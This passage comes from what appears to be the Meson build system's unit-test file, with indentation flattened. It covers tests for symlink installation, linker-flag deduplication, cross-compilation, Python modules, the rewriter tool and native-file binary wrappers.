out = self._run(['otool', '-L', f])
# Ensure that the otool output does not contain self.installdir
self.assertNotRegex(out, self.installdir + '.*dylib ')
def install_subdir_invalid_symlinks(self, testdir, subdir_path):
'''
Test that installation of broken symlinks works fine.
https://github.com/mesonbuild/meson/issues/3914
'''
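        # Expected outcome (added for clarity): the dangling symlink must be
        # installed as a symlink pointing at the same (nonexistent) target,
        # so os.path.islink() is true while os.path.isfile() is false.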
testdir = os.path.join(self.common_test_dir, testdir)
subdir = os.path.join(testdir, subdir_path)
curdir = os.getcwd()
os.chdir(subdir)
# Can't distribute broken symlinks in the source tree because it breaks
# the creation of zipapps. Create it dynamically and run the test by
# hand.
src = '../../nonexistent.txt'
os.symlink(src, 'invalid-symlink.txt')
try:
self.init(testdir)
self.build()
self.install()
install_path = subdir_path.split(os.path.sep)[-1]
link = os.path.join(self.installdir, 'usr', 'share', install_path, 'invalid-symlink.txt')
self.assertTrue(os.path.islink(link), msg=link)
self.assertEqual(src, os.readlink(link))
self.assertFalse(os.path.isfile(link), msg=link)
finally:
os.remove(os.path.join(subdir, 'invalid-symlink.txt'))
os.chdir(curdir)
def test_install_subdir_symlinks(self):
self.install_subdir_invalid_symlinks('62 install subdir', os.path.join('sub', 'sub1'))
def test_install_subdir_symlinks_with_default_umask(self):
self.install_subdir_invalid_symlinks('195 install_mode', 'sub2')
def test_install_subdir_symlinks_with_default_umask_and_mode(self):
self.install_subdir_invalid_symlinks('195 install_mode', 'sub1')
@skipIfNoPkgconfigDep('gmodule-2.0')
def test_ldflag_dedup(self):
testdir = os.path.join(self.unit_test_dir, '52 ldflagdedup')
if is_cygwin() or is_osx():
raise unittest.SkipTest('Not applicable on Cygwin or OSX.')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
max_count = 0
search_term = '-Wl,--export-dynamic'
with open(build_ninja, 'r', encoding='utf-8') as f:
for line in f:
max_count = max(max_count, line.count(search_term))
self.assertEqual(max_count, 1, 'Export dynamic incorrectly deduplicated.')
def test_compiler_libs_static_dedup(self):
testdir = os.path.join(self.unit_test_dir, '56 dedup compiler libs')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
lines = f.readlines()
for lib in ('-ldl', '-lm', '-lc', '-lrt'):
for line in lines:
if lib not in line:
continue
                # Assert that each of these libraries appears exactly once on
                # any link line that mentions it, i.e. duplicates were removed.
self.assertEqual(len(line.split(lib)), 2, msg=(lib, line))
@skipIfNoPkgconfig
def test_noncross_options(self):
# C_std defined in project options must be in effect also when native compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir, extra_args=['-Dpkg_config_path=' + testdir])
compdb = self.get_compdb()
self.assertEqual(len(compdb), 2)
self.assertRegex(compdb[0]['command'], '-std=c99')
self.assertRegex(compdb[1]['command'], '-std=c99')
self.build()
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '61 identity cross')
crossfile = tempfile.NamedTemporaryFile(mode='w')
env = {'CC': '"' + os.path.join(testdir, 'build_wrapper.py') + '"'}
crossfile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'host_wrapper.py')))
crossfile.flush()
self.meson_cross_file = crossfile.name
# TODO should someday be explicit about build platform only here
self.init(testdir, override_envvars=env)
@skipIfNoPkgconfig
def test_static_link(self):
if is_cygwin():
raise unittest.SkipTest("Cygwin doesn't support LD_LIBRARY_PATH.")
# Build some libraries and install them
testdir = os.path.join(self.unit_test_dir, '69 static link/lib')
libdir = os.path.join(self.installdir, self.libdir)
oldprefix = self.prefix
self.prefix = self.installdir
self.init(testdir)
self.install(use_destdir=False)
        # Test that the installed libraries work
self.new_builddir()
self.prefix = oldprefix
meson_args = ['-Dc_link_args=-L{}'.format(libdir),
'--fatal-meson-warnings']
testdir = os.path.join(self.unit_test_dir, '69 static link')
env = {'PKG_CONFIG_LIBDIR': os.path.join(libdir, 'pkgconfig')}
self.init(testdir, extra_args=meson_args, override_envvars=env)
self.build()
self.run_tests()
def should_run_cross_arm_tests():
return shutil.which('arm-linux-gnueabihf-gcc') and not platform.machine().lower().startswith('arm')
@unittest.skipUnless(not is_windows() and should_run_cross_arm_tests(), "requires ability to cross compile to ARM")
class LinuxCrossArmTests(BasePlatformTests):
'''
Tests that cross-compilation to Linux/ARM works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'ubuntu-armhf.txt')
def test_cflags_cross_environment_pollution(self):
'''
Test that the CFLAGS environment variable does not pollute the cross
environment. This can't be an ordinary test case because we need to
inspect the compiler database.
'''
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir, override_envvars={'CFLAGS': '-DBUILD_ENVIRONMENT_ONLY'})
compdb = self.get_compdb()
self.assertNotIn('-DBUILD_ENVIRONMENT_ONLY', compdb[0]['command'])
def test_cross_file_overrides_always_args(self):
'''
Test that $lang_args in cross files always override get_always_args().
Needed for overriding the default -D_FILE_OFFSET_BITS=64 on some
architectures such as some Android versions and Raspbian.
https://github.com/mesonbuild/meson/issues/3049
https://github.com/mesonbuild/meson/issues/3089
'''
testdir = os.path.join(self.unit_test_dir, '33 cross file overrides always args')
self.meson_cross_file = os.path.join(testdir, 'ubuntu-armhf-overrides.txt')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-D_FILE_OFFSET_BITS=64.*-U_FILE_OFFSET_BITS')
self.build()
def test_cross_libdir(self):
# When cross compiling "libdir" should default to "lib"
# rather than "lib/x86_64-linux-gnu" or something like that.
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
for i in self.introspect('--buildoptions'):
if i['name'] == 'libdir':
self.assertEqual(i['value'], 'lib')
return
self.assertTrue(False, 'Option libdir not in introspect data.')
def test_std_remains(self):
# C_std defined in project options must be in effect also when cross compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-std=c99')
self.build()
@skipIfNoPkgconfig
def test_pkg_config_option(self):
if not shutil.which('arm-linux-gnueabihf-pkg-config'):
raise unittest.SkipTest('Cross-pkgconfig not found.')
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
def should_run_cross_mingw_tests():
return shutil.which('x86_64-w64-mingw32-gcc') and not (is_windows() or is_cygwin())
@unittest.skipUnless(not is_windows() and should_run_cross_mingw_tests(), "requires ability to cross compile with MinGW")
class LinuxCrossMingwTests(BasePlatformTests):
'''
Tests that cross-compilation to Windows/MinGW works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'linux-mingw-w64-64bit.txt')
def test_exe_wrapper_behaviour(self):
'''
Test that an exe wrapper that isn't found doesn't cause compiler sanity
checks and compiler checks to fail, but causes configure to fail if it
requires running a cross-built executable (custom_target or run_target)
and causes the tests to be skipped if they are run.
'''
testdir = os.path.join(self.unit_test_dir, '36 exe_wrapper behaviour')
# Configures, builds, and tests fine by default
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
os.mkdir(self.builddir)
# Change cross file to use a non-existing exe_wrapper and it should fail
self.meson_cross_file = os.path.join(testdir, 'broken-cross.txt')
# Force tracebacks so we can detect them properly
env = {'MESON_FORCE_BACKTRACE': '1'}
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*target.*use-exe-wrapper'):
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Drun-target=false',
inprocess=True,
override_envvars=env)
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*run target.*run-prog'):
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Dcustom-target=false',
inprocess=True,
override_envvars=env)
self.init(testdir, extra_args=['-Dcustom-target=false', '-Drun-target=false'],
override_envvars=env)
self.build()
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*PATH'):
# Must run in-process or we'll get a generic CalledProcessError
self.run_tests(inprocess=True, override_envvars=env)
@skipIfNoPkgconfig
def test_cross_pkg_config_option(self):
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
class PythonTests(BasePlatformTests):
'''
Tests that verify compilation of python extension modules
'''
def test_versions(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Skipping python tests with {} backend'.format(self.backend.name))
testdir = os.path.join(self.src_root, 'test cases', 'unit', '39 python extmodule')
# No python version specified, this will use meson's python
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
        # When specifying a known name (python2 / python3), the module
# will also try 'python' as a fallback and use it if the major
# version matches
try:
self.init(testdir, extra_args=['-Dpython=python2'])
self.build()
self.run_tests()
except unittest.SkipTest:
            # python2 is not necessarily installed on the test machine. If it
            # is missing, or its headers cannot be found, the test raises
            # MESON_SKIP_TEST. We could check beforehand which Python versions
            # are available, but that is the module's job, so we simply ask
            # for forgiveness rather than permission.
pass
self.wipe()
for py in ('pypy', 'pypy3'):
try:
self.init(testdir, extra_args=['-Dpython=%s' % py])
except unittest.SkipTest:
                # Same as above: pypy2 and pypy3 are not expected to be present
                # on the test system; the test project only raises in these cases.
continue
# We have a pypy, this is expected to work
self.build()
self.run_tests()
self.wipe()
# The test is configured to error out with MESON_SKIP_TEST
# in case it could not find python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=not-python'])
self.wipe()
# While dir is an external command on both Windows and Linux,
# it certainly isn't python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=dir'])
self.wipe()
class RewriterTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.maxDiff = None
def prime(self, dirname):
copy_tree(os.path.join(self.rewrite_test_dir, dirname), self.builddir)
def rewrite_raw(self, directory, args):
if isinstance(args, str):
args = [args]
command = self.rewrite_command + ['--verbose', '--skip', '--sourcedir', directory] + args
p = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
universal_newlines=True, timeout=60)
print('STDOUT:')
print(p.stdout)
print('STDERR:')
print(p.stderr)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
if not p.stderr:
return {}
return json.loads(p.stderr)
def rewrite(self, directory, args):
if isinstance(args, str):
args = [args]
return self.rewrite_raw(directory, ['command'] + args)
def test_target_source_list(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_add_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['a5.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['a5.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['a3.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp', 'a4.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_add_sources_abs(self):
self.prime('1 basic')
abs_src = [os.path.join(self.builddir, x) for x in ['a1.cpp', 'a2.cpp', 'a6.cpp']]
add = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "src_add", "sources": abs_src}])
inf = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "info"}])
self.rewrite(self.builddir, add)
out = self.rewrite(self.builddir, inf)
expected = {'target': {'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']}}}
self.assertDictEqual(out, expected)
def test_target_remove_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'rmSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileC.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_subdir(self):
self.prime('2 subdirs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c', 'third.c']}
self.assertDictEqual(list(out['target'].values())[0], expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(list(out['target'].values())[0], expected)
def test_target_remove(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
    def test_target_add(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog10@sha': {'name': 'trivialprog10', 'sources': ['new1.cpp', 'new2.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_remove_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, {})
def test_target_add_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c']}
self.assertDictEqual(out['target']['94b671c@@something@exe'], expected)
def test_target_source_sorting(self):
self.prime('5 sorting')
add_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'src_add', 'sources': ['a666.c']}])
inf_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'info'}])
out = self.rewrite(self.builddir, add_json)
out = self.rewrite(self.builddir, inf_json)
expected = {
'target': {
'exe1@exe': {
'name': 'exe1',
'sources': [
'aaa/a/a1.c',
'aaa/b/b1.c',
'aaa/b/b2.c',
'aaa/f1.c',
'aaa/f2.c',
'aaa/f3.c',
'bbb/a/b1.c',
'bbb/b/b2.c',
'bbb/c1/b5.c',
'bbb/c2/b7.c',
'bbb/c10/b6.c',
'bbb/a4.c',
'bbb/b3.c',
'bbb/b4.c',
'bbb/b5.c',
'a1.c',
'a2.c',
'a3.c',
'a10.c',
'a20.c',
'a30.c',
'a100.c',
'a101.c',
'a110.c',
'a210.c',
'a666.c',
'b1.c',
'c2.c'
]
}
}
}
self.assertDictEqual(out, expected)
def test_target_same_name_skip(self):
self.prime('4 same name targets')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'myExe', 'sources': ['main.cpp']}
self.assertEqual(len(out['target']), 2)
for val in out['target'].values():
self.assertDictEqual(expected, val)
def test_kwargs_info(self):
self.prime('3 kwargs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.2', 'meson_version': '0.50.0', 'license': ['GPL', 'MIT']},
'target#tgt1': {'build_by_default': False, 'build_rpath': '/usr/local', 'dependencies': 'dep1'},
'dependency#dep1': {'required': True, 'method': 'cmake'}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_add(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'add.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': ['GPL', 'MIT', 'BSD']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': 'GPL'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove_regex(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove_regex.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=true']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {},
'target#tgt1': {},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=True', 'cpp_std=c++11']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['cpp_std=c++14', 'debug=true']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
class NativeFileTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.testcase = os.path.join(self.unit_test_dir, '47 native file binary')
self.current_config = 0
self.current_wrapper = 0
def helper_create_native_file(self, values):
"""Create a config file as a temporary file.
values should be a nested dictionary structure of {section: {key:
value}}
"""
filename = os.path.join(self.builddir, 'generated{}.config'.format(self.current_config))
self.current_config += 1
with open(filename, 'wt') as f:
for section, entries in values.items():
f.write('[{}]\n'.format(section))
for k, v in entries.items():
f.write("{}='{}'\n".format(k, v))
return filename
def helper_create_binary_wrapper(self, binary, dir_=None, extra_args=None, **kwargs):
"""Creates a wrapper around a binary that overrides specific values."""
filename = os.path.join(dir_ or self.builddir, 'binary_wrapper{}.py'.format(self.current_wrapper))
extra_args = extra_args or {}
self.current_wrapper += 1
if is_haiku():
chbang = '#!/bin/env python3'
else:
chbang = '#!/usr/bin/env python3'
with open(filename, 'wt') as f:
f.write(textwrap.dedent('''\
{}
import argparse
import subprocess
import sys
def main():
parser = argparse.ArgumentParser()
'''.format(chbang)))
for name in chain(extra_args, kwargs):
f.write(' parser.add_argument("-{0}", "--{0}", action="store_true")\n'.format(name))
f.write(' args, extra_args = parser.parse_known_args()\n')
for name, value in chain(extra_args.items(), kwargs.items()):
f.write(' if args.{}:\n'.format(name))
f.write(' print("{}", file=sys.{})\n'.format(value, kwargs.get('outfile', 'stdout')))
f.write(' sys.exit(0)\n')
f.write(textwrap.dedent('''
ret = subprocess.run(
["{}"] + extra_args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
print(ret.stdout.decode('utf-8'))
print(ret.stderr.decode('utf-8'), file=sys.stderr)
sys.exit(ret.returncode)
if __name__ == '__main__':
main()
'''.format(binary)))
if not is_windows():
os.chmod(filename, 0o755)
return filename
# On windows we need yet another level of indirection, as cmd cannot
# invoke python files itself, so instead we generate a .bat file, which
# invokes our python wrapper
batfile = os.path.join(self.builddir, 'binary_wrapper{}.bat'.format(self.current_wrapper))
with open(batfile, 'wt') as f:
f.write(r'@{} {} %*'.format(sys.executable, filename))
return batfile
def helper_for_compiler(self, lang, cb, for_machine = MachineChoice.HOST):
"""Helper for generating tests for overriding compilers for langaugages
with more than one implementation, such as C, C++, ObjC, ObjC++, and D.
"""
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, for_machine)
cc = getter()
binary, newid = cb(cc)
env.binaries[for_machine].binaries[lang] = binary
compiler = getter()
self.assertEqual(compiler.id, newid)
def test_multiple_native_files_override(self):
wrapper = self.helper_create_binary_wrapper('bash', version='foo')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config2 = self.helper_create_native_file({'binaries': {'bash': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
# This test hangs on cygwin.
@unittest.skipIf(os.name != 'posix' or is_cygwin(), 'Uses fifos, which are not available on non Unix OSes.')
def test_native_file_is_pipe(self):
fifo = os.path.join(self.builddir, 'native.file')
os.mkfifo(fifo)
with tempfile.TemporaryDirectory() as d:
wrapper = self.helper_create_binary_wrapper('bash', d, version='12345')
def filler():
with open(fifo, 'w') as f:
f.write('[binaries]\n')
f.write("bash = '{}'\n".format(wrapper))
thread = threading.Thread(target=filler)
thread.start()
self.init(self.testcase, extra_args=['--native-file', fifo, '-Dcase=find_program'])
thread.join()
os.unlink(fifo)
self.init(self.testcase, extra_args=['--wipe'])
def test_multiple_native_files(self):
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('python')
config2 = self.helper_create_native_file({'binaries': {'python': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
def _simple_test(self, case, binary):
wrapper = self.helper_create_binary_wrapper(binary, version='12345')
config = self.helper_create_native_file({'binaries': {binary: wrapper}})
self.init(self.testcase, extra_args=['--native-file', config, '-Dcase={}'.format(case)])
def test_find_program(self):
self._simple_test('find_program', 'bash')
def test_config_tool_dep(self):
# Do the skip at this level to avoid screwing up the cache
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with LLVM on MSYS2')
if not shutil.which('llvm-config'):
            raise unittest.SkipTest('llvm-config not installed, cannot test')
self._simple_test('config_dep', 'llvm-config')
def test_python3_module(self):
self._simple_test('python3', 'python3')
def test_python_module(self):
if is_windows():
# Bat adds extra crap to stdout, so the version check logic in the
# python module breaks. This is fine on other OSes because they
# don't need the extra indirection.
raise unittest.SkipTest('bat indirection breaks internal sanity checks.')
if os.path.exists('/etc/debian_version'):
rc = subprocess.call(['pkg-config', '--cflags', 'python2'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
if rc != 0:
# Python 2 will be removed in Debian Bullseye, thus we must
# remove the build dependency on python2-dev. Keep the tests
# but only run them if dev packages are available.
raise unittest.SkipTest('Not running Python 2 tests because dev packages not installed.')
self._simple_test('python', 'python')
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CC')
def test_c_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('c', cb)
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CXX')
def test_cpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('cpp', cb)
@skip_if_not_language('objc')
@skip_if_env_set('OBJC')
def test_objc_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('objc', cb)
@skip_if_not_language('objcpp')
